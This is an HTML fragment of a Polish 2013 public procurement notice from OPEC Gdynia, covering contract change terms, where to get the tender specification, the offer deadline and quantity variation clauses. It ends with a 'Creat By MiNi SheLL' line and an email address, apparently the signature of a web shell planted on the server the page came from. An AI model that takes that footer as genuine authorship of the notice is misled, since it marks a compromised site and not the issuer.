<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, na uzasadniony wniosek Wykonawcy lub zamawiającego w następującym zakresie:
a	opóźnienia wyboru Wykonawcy, powodującego konieczność wydłużenia umownego terminu realizacji umowy;
b	zmiany danych podmiotowych Wykonawcy;
c	zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego;
d	wydłużenia terminu realizacji przedmiotu zamówienia, spowodowanego niezależnymi okolicznościami tj. działaniem tzw. siły wyższej, zmianą przepisów prawnych, katastrofalnym działaniem przyrody, zaburzeniem życia zbiorowego itp., których wystąpienia strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
e	konieczności poprawienia oczywistej omyłki rachunkowej lub pisarskiej;
f	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy, a mających charakter zmian nieistotnych tzn. takich, 
o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.opecgdy.com.pl/index.php/aktualneprzetargi/aktualne-przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowe Przedsiębiorstwo Energetyki Cieplnej Sp. z o.o.
ul. Opata Hackiego14
81-213 Gdynia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 11:00, miejsce: Okręgowe Przedsiębiorstwo Energetyki Cieplnej Sp. z o.o.
ul. Opata Hackiego14
81-213 Gdynia
kancelaria na parterze budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zakres ilościowy przedmiotu zamówienia jest zakresem szacunkowym określonym przez zamawiającego z należytą starannością. Zamawiający, z uwagi na charakter prowadzonej działalności, może nie zapewnić realizacji zamówienia w zakresie opisanym w dokumentacji przetargowej.
2.	Zamawiający oświadcza, że w okresie realizacji przedmiotu zamówienia minimalna gwarantowana realizacja wyniesie nie mniej niż 75% wartości udzielonego zamówienia, określonego na podstawie przeprowadzonego postępowania przetargowego, zaś co do pozostałych 25% - w przypadku nie złożenia zamówienia na usługi, Wykonawcy nie przysługują jakiekolwiek roszczenia wobec zamawiającego.
3.	Zamawiający oświadcza, że zastrzega sobie możliwość zwiększenia zakresu przedmiotu zamówienia o jednakowy asortyment, maksymalnie o 25% w stosunku do pierwotnej wartości przedmiotu zamówienia (w takim przypadku obowiązywać będą ceny określone w zawartej umowie).
4.	Ilości określone w tabelach w pkt. 3.2.1  specyfikacji są ilościami szacunkowymi, wyliczonymi z należytą starannością. Dopuszcza się różnice w ilościach planowanych w poszczególnych pozycjach w stosunku do faktycznie realizowanych w trakcie trwania umowy z uwzględnieniem zapisu pkt. 21.3 siwz.
5.	Realizacja dostaw przewidzianych w zakresie, o którym mowa w pkt. 21.3 niniejszej siwz odbywać się będzie zgodnie z pkt. 4.2 siwz..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com